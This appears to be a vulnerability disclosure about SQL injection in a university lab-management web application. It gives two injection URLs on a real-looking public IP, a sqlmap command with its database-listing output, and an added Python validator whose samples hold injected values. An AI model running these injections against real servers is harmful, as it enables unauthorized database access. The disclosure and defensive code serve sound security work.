SQL injection with SA privileges in a teaching management system, batch #3 (not a duplicate)
This is the "lab teaching management system"
Address: http://www.wanxinsoft.com/product1_3.asp
The system is in use at a number of universities.
The vulnerable files are:
/Model/TwoGradePage/NewsEquipment.aspx
/Model/TwoGradePage/LookShiYanShi.aspx
Vulnerability exploitation demonstration:
Injection point 1: http://202.206.48.106/model/TwoGradePage/LookShiYanShi.aspx?LID=1127&columnId=203
Injection point 2: http://202.206.48.106/model/TwoGradePage/NewsEquipment.aspx?Id=45023&openid=86&columnId=203
sqlmap.py -u "http://202.206.48.106/model/TwoGradePage/NewsEquipment.aspx?Id=45023&openid=86&columnId=203" --dbs
Available databases [8]:
[*] Hebmu
[*] Master
[*] Model
[*] Msdb
[*] Northwind
[*] Pubs
[*] Tempdb
[*] Uddi
Solution:
Filter
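One way to apply the "filter" fix to the two pages above, shown as an added example that is not the vendor's or the original author's code. It assumes LID, Id, openid and columnId are plain integer IDs (inferred from the URLs on this page); the function names are hypothetical and the sample request lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Paths named on this page as vulnerable (compared case-insensitively, as IIS does).
WATCHED_PATHS = {
    "/model/twogradepage/newsequipment.aspx",
    "/model/twogradepage/lookshiyanshi.aspx",
}
# Parameters seen in the page's URLs. Assumption: each is a plain integer ID.
INT_PARAMS = {"lid", "id", "openid", "columnid"}
INT_RE = re.compile(r"[0-9]{1,9}")


def check_request(url):
    """Return the (param, decoded value) pairs that fail integer validation.

    An empty list means the request passes; other paths are ignored.
    """
    parts = urlsplit(url)
    if parts.path.lower() not in WATCHED_PATHS:
        return []
    bad = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in INT_PARAMS and not INT_RE.fullmatch(value):
            bad.append((name, value))
    return bad


def scan(urls):
    """Map each offending request to its failing parameters (for log review)."""
    return {u: bad for u in urls if (bad := check_request(u))}


# Constructed sample request targets (not taken from real logs).
SAMPLE = [
    "/model/TwoGradePage/NewsEquipment.aspx?Id=45023&openid=86&columnId=203",
    "/Model/TwoGradePage/NewsEquipment.aspx?Id=45023%27&openid=86&columnId=203",
    "/model/TwoGradePage/LookShiYanShi.aspx?LID=1127&columnId=203%20AND%201%3D1",
    "/Model/Other.aspx?Id=abc",
]

if __name__ == "__main__":
    for url, bad in scan(SAMPLE).items():
        print("rejected:", url, bad)
```

The same check can reject requests at the edge or flag entries in web server logs. Input validation narrows what reaches the database, but the queries in both pages should also bind these values as parameters instead of concatenating them into SQL.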